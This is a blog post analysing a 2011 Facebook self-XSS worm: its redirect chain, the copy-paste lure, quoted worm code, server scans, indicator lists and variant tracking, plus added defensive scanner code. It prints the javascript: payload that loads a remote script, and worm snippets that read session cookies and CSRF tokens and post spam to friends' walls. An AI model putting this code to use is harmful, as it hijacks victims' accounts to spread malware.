Taking down Facebook worms
The other day I was browsing Facebook and a friend of mine posted this on my wall:
This is realy insane.. you have to see this
OMG.. Look What THIS Kid Did to His School After Being Expelled!
j.mp
WARNING: Graphic Content!
This would be fishy anyway because he is Dutch (and the post is in English); on top of that, he posted the same message on all his friends' walls at the same moment.
I was interested in why somebody would create such a worm, so I started poking around to see what I could find.
The application behind j.mp (bit.ly's short domain) is pretty good: it is a URL shortener in which you can track the clicks on a URL, geolocate your visitors, look up referrers, and it has everything a URL shortener should have.
Let's see where we are going:
http://j.mp/ilMSsO ===(301 Moved)===> http://zamalo.nl.ai/
I looked up this domain, got whois information and was able to find the phone number of the owner from a different place.
I did have contact with the owner of this domain; the person is knowledgeable about computer security and I was able to verify the details. There was also further proof that this person has knowledge of computer security.
I am not going to publish personal details about the person, for my and the person's protection; it might not even be the right person.
owner@box2:~$ nc zamalo.nl.ai 80
GET / HTTP/1.1
Host: zamalo.nl.ai

HTTP/1.1 301 Moved Permanently
Date: Sun, 15 May 2011 12:08:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://j.mp/itYim7
Content-Length: 368
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://j.mp/itYim7">here</a>.</p>
<hr>
<address>Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at zamalo.nl.ai Port 80</address>
</body></html>
The only thing we get is a 301 Moved Permanently back to a j.mp link.
This server looks a lot like a trick to make it hard for Facebook to ban the links.
If j.mp or Facebook bans a link, the creators of the worm can just change the link being spread in the source code. Had they used a single static link, it could be banned and they would lose the game; this way they can keep track of who is clicking on what and from where, monitor whether the links are being banned, and change the link when necessary.
http://j.mp/itYim7 ===(301 Moved)===> http://www.facebook.com/pages/Crazy-kid-vide0/186441208070914?sk=app_190322544333196
Now we are back at facebook.com on some page called "Crazy kid vide0".
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html is the content you are actually looking at at that point (loaded into the Facebook page).
The page asks us to complete a "5 second security check" and shows a big box labelled "Watch the Video"; it looks like a normal Facebook page, so let's click the blue button.
The page contains one image: http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png
The page first wants us to click a button and then follow these instructions:
1 - Press CTRL + C
2 - Press ALT + D
3 - Press CTRL + V
4 - Press Enter
5 - Watch video!
When you click the button, this JavaScript runs:
<script type="text/javascript">// <![CDATA[
$(document).ready(function() {
  $("#button").click(function(){
    // hide the "Watch the Video" button and show the key-press instructions
    $("#button").css("display","none");
    $("#key").css("display","block");
    // focus the hidden textarea and select its contents, so that the
    // victim's CTRL+C copies the javascript: payload to the clipboard
    $("#c").focus();
    $("#c").select();
  });
});
// ]]></script>
#c is a text area containing:
<textarea id="c">
javascript:(a=(b=document).createElement('script')).src='//zaman.c0m.li/k.js',
b.body.appendChild(a);void(0)
</textarea>
CTRL-C = copy the selected text (the contents of #c)
ALT-D = focus the address bar and select everything in it
CTRL-V = paste, replacing the current URL with the javascript: payload
ENTER = navigate to whatever is in the address bar; for a javascript: URL that means executing it in the context of the page currently open, facebook.com
So clicking the button selects the contents of #c so that CTRL+C copies them to our clipboard; when we follow the rest of the instructions we load a script of the attacker's choosing into the Facebook page.
The pasted JavaScript appends a new script element to the document, loading http://zaman.c0m.li/k.js (the protocol-relative //zaman.c0m.li/k.js takes the scheme of the Facebook page it is pasted into).
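The following is an added example and not code from the original post or from the worm: a small scanner that looks for this "paste it into your address bar" self-XSS lure in a page's HTML and recovers the script it would load. LURE_HTML is a constructed fragment modelled on the lure page described above; the function names (findJavascriptPayloads, extractLoaderUrls, analyseLurePage) are my own.

```javascript
// Added example (not code from the original post or from the worm): scan a
// page's HTML for the "paste this into your address bar" self-XSS lure and
// recover the script URL it would load. LURE_HTML is a constructed fragment
// modelled on the lure page described above.

const LURE_HTML = `
<div id="button">Watch the Video</div>
<div id="key" style="display:none">1 - Press CTRL + C 2 - Press ALT + D 3 - Press CTRL + V 4 - Press Enter</div>
<textarea id="c">
javascript:(a=(b=document).createElement('script')).src='//zaman.c0m.li/k.js',
b.body.appendChild(a);void(0)
</textarea>
`;

// Collect <textarea> bodies and <input value="..."> attributes that begin with a
// javascript: URL, the only kind of text that does anything when pasted into the
// address bar and submitted.
function findJavascriptPayloads(html) {
  const payloads = [];
  const textareas = /<textarea\b[^>]*>([\s\S]*?)<\/textarea>/gi;
  const inputs = /<input\b[^>]*\bvalue\s*=\s*(["'])([\s\S]*?)\1/gi;
  let m;
  while ((m = textareas.exec(html)) !== null) {
    if (/^\s*javascript:/i.test(m[1])) payloads.push(m[1].trim());
  }
  while ((m = inputs.exec(html)) !== null) {
    if (/^\s*javascript:/i.test(m[2])) payloads.push(m[2].trim());
  }
  return payloads;
}

// Every URL assigned to a .src inside the bookmarklet, resolved against the
// origin the victim pastes it into: a protocol-relative '//host/path' takes the
// scheme of that origin, so the same payload loads over https on an https page.
function extractLoaderUrls(payload, pageOrigin) {
  const urls = [];
  const srcAssign = /\.src\s*=\s*(["'])([^"']+)\1/g;
  let m;
  while ((m = srcAssign.exec(payload)) !== null) {
    urls.push(new URL(m[2], pageOrigin).href);
  }
  return urls;
}

// One record per payload: the bookmarklet text, the URLs it pulls code from,
// the third-party hosts among them, and whether the page coaches the victim
// towards the address bar (ALT+D / CTRL+L are the usual hints).
function analyseLurePage(html, pageOrigin) {
  const addressBarHint = /ALT\s*\+\s*D|CTRL\s*\+\s*L|address bar/i.test(html);
  return findJavascriptPayloads(html).map((payload) => {
    const loads = extractLoaderUrls(payload, pageOrigin);
    return {
      payload,
      loads,
      externalHosts: loads
        .map((u) => new URL(u).hostname)
        .filter((h) => !/(^|\.)facebook\.com$/.test(h)),
      addressBarHint,
    };
  });
}

const report = analyseLurePage(LURE_HTML, 'https://www.facebook.com/');
console.log(JSON.stringify(report, null, 2));
```

Run it with node; for the constructed lure it reports one payload that loads https://zaman.c0m.li/k.js when pasted on an https Facebook page and http://zaman.c0m.li/k.js on an http one, which is exactly why the worm uses the scheme-less form.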
c0m.li is a service a lot like nl.ai; the only difference is that c0m.li seems to be getting DDoSed at the moment, or something like it.
It has a whois lookup system, but by the time it was back up the domain had been deleted again, along with its whois records.
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html also loads a public tracking application (whos.amung.us).
http://whos.amung.us/stats/kn9gjo9y9tms/
Here we can see that the tracking system is active since April.
There is also a real-time stream of what visitors copy to their clipboards, which is quite funny, because we can watch the malicious script being copied to loads of clipboards.
It is a way of social-engineering the victim into executing JavaScript in their own browser on a specific origin (self-XSS). Facebook cannot do much about it, because the attacker abuses the user rather than a server-side vulnerability that Facebook could patch.
You can find a full backup of the malicious JavaScript here.
Let us go through the code:
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
}
return null;
}
There is nothing malicious about readCookie(); it is a widely shared helper written by Scott Andrew. It takes one argument, the name of the cookie whose value you want returned.
var user_id = readCookie("c_user");
var user_name = document.getElementById('navAccountName').innerHTML;
This reads the "c_user" cookie (the numeric Facebook user ID) with readCookie() and grabs the account's full name from the contents of the element with id "navAccountName".
var coverpage = function() {
  var boxdiv = document.createElement('div');
  boxdiv.id = 'coverpage1';
  boxdiv.style.display = 'block';
  boxdiv.style.position = 'absolute';
  boxdiv.style.width = 100 + '%';
  boxdiv.style.height = 100 + '%';
  boxdiv.style.top = 100 + 'px';
  boxdiv.style.margin.top = 100 + 'auto'; // has no effect: style.margin is a string, so this assignment is silently dropped
  boxdiv.style.margin = 0 + 'auto';
  boxdiv.style.textAlign = 'center';
  boxdiv.style.padding = '4px';
  boxdiv.style.background =
    'url(http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png) ' +
    'no-repeat scroll center top';
  boxdiv.style.fontSize = '15px';
  boxdiv.style.zIndex = 9999999;
  // overlay: the victim's own profile picture and name, plus the "Scanning...." gif
  boxdiv.innerHTML = ' <table align="center" cellpadding="5" cellspacing="5" width="400px"><tr align="left">' +
    '<td valign="middle"><br /><br /><br /><br /><img style="border: 1px solid black;padding:5px;' +
    'margin:10px;width:140px;height:140px;" src="http://graph.facebook.com/' + user_id + '/picture?type=large" />' +
    '</td><td align="left" valign="middle"><font style="font-weight: bold;font-size:16px;">' + user_name + '</font>' +
    '<br /><img src="http://i.imgur.com/hRjNi.gif" style="margin-left:20px;padding-left: 5px;"/></td></tr>' +
    '</table>';
  document.body.appendChild(boxdiv);
}
coverpage();
Here the script creates a div with the id "coverpage1" and a background image, "http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png", which looks a lot like the image seen earlier ("http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png").
The div looks identical to the one created earlier, but carries a different message.
This image says "Please wait while we verify your profile.." and looks like a legitimate Facebook message.
It also embeds an animated GIF:
http://i.imgur.com/hRjNi.gif
A ten-frame animated GIF reading "Scanning...."; the image has no useful EXIF tags.
On imgur.com you can see that this picture has been viewed over 900.000 times and that it was uploaded 2 weeks ago.
source: http://imgur.com/hRjNi
// Setup some variables
// post_form_id and fb_dtsg are Facebook's anti-CSRF tokens, read straight from the victim's own page
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Chat message variables
var this_chat = "The kid in This video is realy insane.. " +
  "he went beserk when he was being expelled frm sch0ol.. see what he did j.mp/ilMSsO";
var prepared_chat = encodeURIComponent(this_chat);
This templated setup suggests that there are more versions of this piece of malware.
prepared_chat is used only once after being declared here; presumably the author wants the message to be quick and easy to swap out.
On the other hand, other things in this code are hard-coded.
The next part of the code posts on all of the victim's friends' walls.
var paramswp = "post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg +
  "&xhpc_composerid=u574553_1&xhpc_targetid=" + response1.payload.entries[count].uid +
  "&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0" +
  "&attachment[params][metaTagMap][0][http-equiv]=content-type" +
  "&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8" +
  "&attachment[params][metaTagMap][1][property]=og%3Atitle" +
  "&attachment[params][metaTagMap][1][content]=Check Out your PROFILE Stalkers" +
  "&attachment[params][metaTagMap][2][property]=og%3Aurl" +
  "&attachment[params][metaTagMap][2][content]=http://www.facebook.com" +
  "&attachment[params][metaTagMap][3][property]=og%3Asite_name" +
  "&attachment[params][metaTagMap][3][content]=OMG.. Look What THIS Kid Did to His School After Being Expelled!" +
  "&attachment[params][metaTagMap][4][property]=og%3Aimage" +
  "&attachment[params][metaTagMap][4][content]=http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg" +
  "&attachment[params][metaTagMap][5][property]=og%3Adescription" +
  "&attachment[params][metaTagMap][5][content]=WARNING: Graphic Content!" +
  "&attachment[params][metaTagMap][6][name]=description" +
  "&attachment[params][metaTagMap][6][content]=BBC News" +
  "&attachment[params][metaTagMap][7][http-equiv]=Content-Type" +
  "&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8" +
  "&attachment[params][medium]=106" +
  "&attachment[params][urlInfo][user]=http://j.mp/keyNwY" +
  "&attachment[params][favicon]=http://lol.info/os/favicon.ico" +
  "&attachment[params][title]=OMG.. Look What THIS Kid Did to His School After Being Expelled!" +
  "&attachment[params][fragment_title]=" +
  "&attachment[params][external_author]=" +
  "&attachment[params][summary]=WARNING: Graphic Content!" +
  "&attachment[params][url]=http://www.facebook.com" +
  "&attachment[params][ttl]=0" +
  "&attachment[params][error]=1" +
  "&attachment[params][responseCode]=206" +
  "&attachment[params][metaTags][description]=WARNING: Graphic Content!" +
  "&attachment[params][images][0]=http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg" +
  "&attachment[params][scrape_time]=1302991496" +
  "&attachment[params][cache_hit]=1" +
  "&attachment[type]=100" +
  "&xhpc_message_text=Get it now hurry while it lasts" +
  "&xhpc_message=This is realy insane.. you have to see this" +
  "&nctr[_mod]=pagelet_wall" +
  "&lsd" +
  "&post_form_id_source=AsyncRequest";
The wall post being created is the one that originally started my investigation.
As you can see, the message "OMG.. Look What THIS Kid Did to His School After Being Expelled!" is hard-coded in attachment[params][title].
Amusingly, the author must have changed the URL while I was investigating this code, since it now points to "http://j.mp/keyNwY"; presumably the previous link got terminated, or the links are rotated automatically.
Why http://lol.info/os/favicon.ico is there is not obvious to me.
The image of a boy being arrested can be found here: http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg
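As an added example (not part of the original post or of k.js), here is a parser for the bracketed form encoding the wall-post body above uses, followed by extraction of the indicators a defender would block on: the favicon, the click-through target, the title and every URL that does not point at facebook.com. SAMPLE_BODY is a trimmed copy of the paramswp string with the dynamic tokens replaced by labelled placeholders; the function names are my own.

```javascript
// Added example, not part of the original post or of k.js: parse a PHP-style
// bracketed form body like the paramswp string above and pull out the
// indicators a defender would block on. SAMPLE_BODY is a trimmed copy of that
// string with the dynamic tokens replaced by placeholders.

const SAMPLE_BODY = [
  'post_form_id=PLACEHOLDER_PFID',
  'fb_dtsg=PLACEHOLDER_DTSG',
  'xhpc_targetid=PLACEHOLDER_FRIEND_UID',
  'xhpc_context=profile',
  'attachment[params][metaTagMap][1][property]=og%3Atitle',
  'attachment[params][metaTagMap][1][content]=Check Out your PROFILE Stalkers',
  'attachment[params][metaTagMap][2][property]=og%3Aurl',
  'attachment[params][metaTagMap][2][content]=http://www.facebook.com',
  'attachment[params][urlInfo][user]=http://j.mp/keyNwY',
  'attachment[params][favicon]=http://lol.info/os/favicon.ico',
  'attachment[params][title]=OMG.. Look What THIS Kid Did to His School After Being Expelled!',
  'attachment[params][images][0]=http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg',
  'xhpc_message=This is realy insane.. you have to see this',
  'lsd',
].join('&');

// Percent-decode a form value; malformed sequences are returned untouched
// rather than throwing, so one bad value cannot abort the whole parse.
function decodeFormValue(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

// "attachment[params][metaTagMap][1][property]" -> ["attachment", "params", "metaTagMap", "1", "property"]
function splitBracketKey(key) {
  const m = /^([^\[]+)((?:\[[^\]]*\])*)$/.exec(key);
  if (!m) return [key];
  const path = [m[1]];
  const seg = /\[([^\]]*)\]/g;
  let s;
  while ((s = seg.exec(m[2])) !== null) path.push(s[1]);
  return path;
}

// Build a nested object from "a[b][0]=v&c=w" (the array notation PHP uses for form fields).
function parseFormBody(body) {
  const root = {};
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    const rawKey = (eq === -1 ? pair : pair.slice(0, eq)).trim();
    if (!rawKey) continue;
    const value = eq === -1 ? '' : decodeFormValue(pair.slice(eq + 1).trim());
    const path = splitBracketKey(decodeFormValue(rawKey));
    let node = root;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof node[path[i]] !== 'object' || node[path[i]] === null) node[path[i]] = {};
      node = node[path[i]];
    }
    node[path[path.length - 1]] = value;
  }
  return root;
}

// Visit every string leaf of the parsed tree.
function forEachLeaf(node, visit) {
  if (typeof node === 'string') return visit(node);
  for (const k of Object.keys(node)) forEachLeaf(node[k], visit);
}

// Indicators worth blocking on: the attachment favicon, the click-through
// target, the post title, and every URL that does not point at facebook.com.
function extractIndicators(parsed) {
  const external = new Set();
  forEachLeaf(parsed, (s) => {
    for (const u of s.match(/https?:\/\/[^\s"'<>&]+/g) || []) {
      if (!/(^|\.)facebook\.com$/.test(new URL(u).hostname)) external.add(u);
    }
  });
  const att = (parsed.attachment && parsed.attachment.params) || {};
  return {
    favicon: att.favicon || null,
    clickTarget: (att.urlInfo && att.urlInfo.user) || null,
    title: att.title || null,
    externalUrls: [...external].sort(),
  };
}

const indicators = extractIndicators(parseFormBody(SAMPLE_BODY));
console.log(JSON.stringify(indicators, null, 2));
```

The favicon and the urlInfo target are the two fields that stay constant across the variants discussed further down, which is why they make better block-list keys than the message text.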
The next part sends a message to all online users through chat.
When you try to say "zaman.c0m.li" through chat, Facebook filters it out with the following message:
This message contains blocked content that has previously been flagged as abusive or spammy. Let us know if you think this is an error.
The creator of this malware worked around this by putting the small redirect server in front of the JavaScript.
It looks like this:
j.mp link -> redirector (zamalo.nl.ai) -> j.mp link -> malicious JavaScript
This makes it very hard for Facebook to block the page from being loaded.
The creator can change the j.mp links at any time, which makes it very hard for Facebook to filter them out.
Next, the code attempts to make you like the pages I-Love-Pets, I-Love-My-Mom and I-Love-Money:
http://www.facebook.com/pages/I-Love-Pets/218575568172183?sk=wall&filter=12
http://www.facebook.com/pages/I-Love-My-Mom/209705679060357?sk=wall&filter=12
http://www.facebook.com/pages/I-Love-Money/208298029210038?sk=wall&filter=12
After 19 seconds the function landingpage() is called, which redirects you to http://kid-expelled-vide0.blogspot.com/.
That page contains Google ads, which earn the malware writers money.
So let's summarize what this malware does:
- Propagate
  through Facebook wall posts
  through Facebook chat
- Like the following pages
  I-Love-Pets (218575568172183)
  I-Love-My-Mom (209705679060357)
  I-Love-Money (208298029210038)
- Redirect to a Blogspot page with ads that earn the malware writer money
Notable details:
- The worm's author can track infections with a free stats service (whos.amung.us).
- External data is loaded from various sources.
- Images are hosted on free hosting services (Blogspot, imgur).
External files:
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html
http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png
http://code.jquery.com/jquery-1.5.2.min.js
http://widgets.amung.us/tab.js
https://s3.amazonaws.com/statichtmlapp/scrollbar.js
http://zaman.c0m.li/k.js
http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png
  -> EXIF "Author" tag reads "Ulead Systems, Inc."
http://i.imgur.com/hRjNi.gif
  -> http://imgur.com/hRjNi shows it was uploaded 2 weeks ago and has been viewed over 1 million times
http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg
http://lol.info/os/favicon.ico
virustotal.com shows that k.js is detected only by Kaspersky, as "HEUR:Worm.Script.Generic":
Antivirus    Version      Last Update   Result
Kaspersky    9.0.0.837    2011.05.11    HEUR:Worm.Script.Generic
[Map from whos.amung.us: geographic distribution of infections]
The statistics can be viewed here:
http://whos.amung.us/stats/kn9gjo9y9tms/
This shows that the worm really took off from 10:00 this morning with 3.500 loads; after that it grew exponentially, and nine hours later it was loading over 50.000 times in a single hour.
Yesterday at 19:00 there were just 4 loads in the entire hour.
The stats service also shows that this tracking key is being used on the following pages:
http://s3.amazonaws.com/statichtmlplus/page/187101854670418.html
http://www.iframewrapper.com/ifwrapper/index000.php
http://s3.amazonaws.com/statichtmlplus/page/208841752468551.html
http://s3.amazonaws.com/statichtmlplus/page/129779460433030.html
http://s3.amazonaws.com/statichtmlplus/page/207774512590664.html
http://174.133.107.178/~nextdeal/hk/
These all look interesting, but one really stands out: http://174.133.107.178/~nextdeal/hk/.

owner@box2:~$ nmap 174.133.107.178

Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 22:48 CEST
Nmap scan report for b2.6b.85ae.static.theplanet.com (174.133.107.178)
Host is up (0.16s latency).
Not shown: 978 closed ports
PORT    STATE    SERVICE
1/tcp   filtered tcpmux
3/tcp   filtered compressnet
4/tcp   filtered unknown
6/tcp   filtered unknown
7/tcp   filtered echo
9/tcp   filtered discard
13/tcp  filtered daytime
17/tcp  filtered qotd
19/tcp  filtered chargen
21/tcp  open     ftp
22/tcp  open     ssh
25/tcp  open     smtp
26/tcp  open     rsftp
53/tcp  open     domain
80/tcp  open     http
110/tcp open     pop3
135/tcp filtered msrpc
143/tcp open     imap
443/tcp open     https
465/tcp open     smtps
993/tcp open     imaps
995/tcp open     pop3s
Let's get some more information about what else is hosted on this IP; a Bing ip: search gives:
ip:174.133.107.178
www.rapvet.com
www.moviehd.net
piclol.net
onlinemaking.com
likeportal.com
funnypicsnow.com
quoteslol.com
www.landjsolutions.com
tristateautomobile.com
www.funnypicsnow.com
likepages.us
www.piclol.net
l1ll.info
likeportal.com
www.rapvet.com
likequotes1.info
www.likemyfb.com
www.likepics.us
songsource.net
yupbro.com
songsource.net
yupbro.com
4635.profilestalk.com
profilestalk.com
songsource.net
likebelow.com
www.moviehd.net
quoteslol.com
For now, let's leave this host; the fingerprints show that this is not the IP where the active JavaScript is running.
There are Facebook-related things on here that look pretty evil, but let's leave them for now.
Let's go fingerprint the server where the evil JavaScript is running.
owner@box2:~$ nslookup 174.122.44.67
Server:         192.168.2.1
Address:        192.168.2.1#53

Non-authoritative answer:
67.44.122.174.in-addr.arpa      name = 43.2c.7aae.static.theplanet.com.

Authoritative answers can be found from:

owner@box2:~$ nslookup zaman.c0m.li
Server:         192.168.2.1
Address:        192.168.2.1#53

Non-authoritative answer:
Name:   zaman.c0m.li
Address: 174.122.44.67

220-gator1229.hostgator.com

owner@box2:~$ nmap 174.122.44.67

Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 22:55 CEST
Nmap scan report for 43.2c.7aae.static.theplanet.com (174.122.44.67)
Host is up (0.18s latency).
Not shown: 975 closed ports
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
3/tcp    filtered compressnet
4/tcp    filtered unknown
6/tcp    filtered unknown
7/tcp    filtered echo
9/tcp    filtered discard
13/tcp   filtered daytime
17/tcp   filtered qotd
19/tcp   filtered chargen
21/tcp   open     ftp
22/tcp   filtered ssh
25/tcp   open     smtp
26/tcp   open     rsftp
53/tcp   open     domain
80/tcp   open     http
110/tcp  open     pop3
135/tcp  filtered msrpc
143/tcp  open     imap
443/tcp  open     https
465/tcp  open     smtps
587/tcp  open     submission
993/tcp  open     imaps
995/tcp  open     pop3s
2222/tcp open     unknown
3306/tcp open     mysql

Nmap done: 1 IP address (1 host up) scanned in 6.02 seconds
Bing.com tells us the following:
ip:174.122.44.67
cosmeticindex.com
www.elcaminonationforum.com
hystericalminds.com
simplestorageshedplans.com
www.jetsetsam.com
northstarantiques.net
funboardgames.org
www.etech9.com
livingwordwaukesha.org
nostra-pizza.com
www.etech9.com
dorloo.com
www.animedio.com
www.tanadol.com
lastpoint.biz
profilewatcher.facebook.randomobia.com
girlkillsherself.facebook.randomobia.com
gunceldurum.com
310cashzyngapromo.randomobia.com
www.kamilce.com
kidexpelled.randomobia.com
www.onelasallevancouver.com
mac-downloads.info
attorneyrainmaker.com
11stepwebsite.com
www.turksikisizle.com
nearbylocksmith-silverspring.com
www.askerliksorgulama.com
www.zorunlutrafiksigortasi.net
girlkilledherself.randomobia.com
isms.co.com.au
tiresedmonton.ca
bragardcanada.com
thenockfamilycircus.com
->www.girlsuicide.co.com.au
keepingskinbeautiful.com
usguy.vv.cc
allvacancies.info
->expelledkid.randomobia.com
sevendollarheaven.com
www.icu3.net
www.kidgoescrazy.co.com.au
property-in-secunda.com
www.cosmeticindex.com
www.gazetaonline.net
azbusinesslistings.com
www.gunceldurum.com
scholarshipnow.us
azbusinesslistings.com
www.gunceldurum.com
scholarshipnow.us
expansiongift.ce.ms
covergirlstyle.com
www.storeimpresiones.cl
->girlkilledbaby.randomobia.com
www.indy4me.com
kidgoescrazy.co.com.au
www.oyunbuz.com
www.scarfknitting.com
www.farmbonus.co.com.au
www.celebvids.celebritythongs.net
www.srksurucukursu.com
ikballesifalibitkiler.com
www.canlitvizle1.com
www.vuelveajugar.cl
www.askerliksorgulama.com
www.etech9.com
farmbonus.co.com.au
www.akvaryumbalik.net
webhostingterbaik.com
gunceldurum.com
usguy.vv.cc
www.nurnet.org
www.canlitvizle1.com
www.hystericalminds.com
elcaminonationforum.com
propedall.com
toronto-realestate.mobi
traffictospare.com
get1video.com
whattogetagamer.com
seorank2.com
expelledkid.randomobia.com
sevendollarheaven.com
tomsolution.com
www.kidgoescrazy.co.com.au
www.whattogetagamer.com
giftideasforgamers.com
westriverfire.com
aquaemails.com
sevendollarheaven.com
giftideasforgamers.com
property-in-secunda.com
www.marketinginfo.info
iphone4error.com
videoclips.gazetaonline.net
tirecalgary.com
newscrunched.com
www.cosmeticindex.com
www.myviphealth.com
attorneyrainmaker.com
azbusinesslistings.com
->girlkilledbaby.randomobia.com
As seen here, this server hosts a lot of suspicious things; the randomobia.com and co.com.au hostnames marked with an arrow match the lure themes of the worm variants.
Let's leave this server and check the worm's source-code fingerprint to see how widely the code is being reused.
Source code fingerprint
By googling for "var coverpage = function() {" we get 119 results.
Let's go through the results:
http://pastebin.com/Lk7gSkJq
This is another version of the worm, uploaded on May 13th, 2011.
The content of the wall post would include things like:
Check Out your PROFILE Stalkers
Now you can see who stalk your profile daily
OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour
It uses tinyurl as URL shortener; the link, http://tinyurl.com/3llg74u, has been banned by tinyurl.
The favicon points to "http://lol.info/os/favicon.ico", the same as in the other worm. I would strongly suggest that Facebook filter out this favicon location; it could be a generic way to bring down a lot of spam.
This version likes the following pages:
I Love Pets
I Love Sex
I Love Money
When it is finished it redirects you to http://smrtapplication.info/results.php, where you still cannot see your stalkers.
Right, we can assume there are more versions of this.
http://pastebin.com/8eE260Tk
Another version of the worm, uploaded on May 11th, 2011.
The wall post would include:
Stop creepin on me, I seen you looking at my profile.. I just scanned my profile.. you can scan yours too.
This one looks like an extended version of the worm; blocking the favicon "http://lol.info/os/favicon.ico" would stop this version too.
It uses tiny.cc for URL shortening, and this version of the worm carries several links at once:
var linkies = [
"http://tiny.cc/cepag",
"http://tiny.cc/b19nm",
"http://tiny.cc/e2q60",
"http://tiny.cc/o7op3",
"http://tiny.cc/m4xm3",
"http://tiny.cc/moohg"
]
This is how it selects a link:
var this_chat = "Will you stop looking at my wall? I know you are because I just scanned my profile and seen you on there.. See for yourself.. " + linkies[Math.floor(Math.random()*linkies.length)];
The links (which are not banned at the moment) point to the following URL:
http://www.facebook.com/pages/FindYourStalkers/214672328551612?sk=app_6165549526
This worm looks a lot like the previous version; even the image in the wall post is still the same (http://imgur.com/Drajx.gif, already removed).
This version likes:
http://www.facebook.com/pages/You-always-remember-your-first-love/121864624558934
http://www.facebook.com/pages/I-Love-Sex/153193938081099
and some banned application IDs.
The worm finally tries redirecting you to:
http://myfb-apps.info/stalkers.php
http://pastebin.com/7raazUFF
Another version of the worm from pastebin.com, May 13th, 2011.
This one uses tinyurl.com for URL shortening.
The wall post will include:
OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour
This version of the malware once again uses "http://lol.info/os/favicon.ico" as favicon.
Likes:
I love money
I love sex
I love animals
Final redirection is to http://smrtapplication.info/results.php
http://pastebin.com/RsdMiHUp
Uploaded on May 3rd, 2011
This version targets people interested in the killing of Osama bin Laden. He was killed on May 2nd, 2011, and this worm was uploaded to pastebin.com on the 3rd, which means it may have been developed the very same day!
The chat message which it spreads was:
Watch the Osama Shoot down video @ http://on.fb.me/iCNozz
The favicon being used here was located at "http://dottot.info/os/favicon.ico".
http://mydominio.info/how/boom.php
This domain is actively being used to infect more Facebook users.
http://mydominio.info/how/ -> http://mydominio.info/how/boom.php
The favicon is still the same.
This version is based on the Osama version of the malware.
http://mydominio.info/fin.php (same as http://mydominio.info/how/)
http://stalkersonfb.co.tv/jsp.php
This one tries to make people believe that they can monitor their friends.
It redirects to profile-checker.co.tv.
Wall post:
Whos watching your profile?
Chat message:
yo ! check now who was watching You, go here http://goo.gl/dkJas
goo.gl is Google's URL shortener; the link was not banned at the time.
Favicon: "http://dottot.info/os/favicon.ico"
http://bindetah.co.cc/d.php
Chat message:
Father walks in on his Daughter... EMBARRASIN! @ bit.ly/jEtvSm
Wall post:
Father walks in on his Daughter... EMBARRASIN!
Favicon:
http://dottot.info/os/favicon.ico
http://r00tsecurity.org/forums/topic/13898-facebook-scam-source-code-virus/
Posted: 17 May 2011
Chat message:
omg!! i just got my $1,000 jetBlue giftcard in the mail today!! go get one 2 so we can go somewhere
x.co/XFG8
Favicon:
http://lol.info/os/favicon.ico
http://sarahs-muse.livejournal.com/1188743.html
This version is entirely different from all we have seen before.
This one must have been the prototype of the worm I am investigating; it was developed in early April and has loads of debugging options.
I went through some more versions, but they all show roughly the same fingerprint, just with different messages.
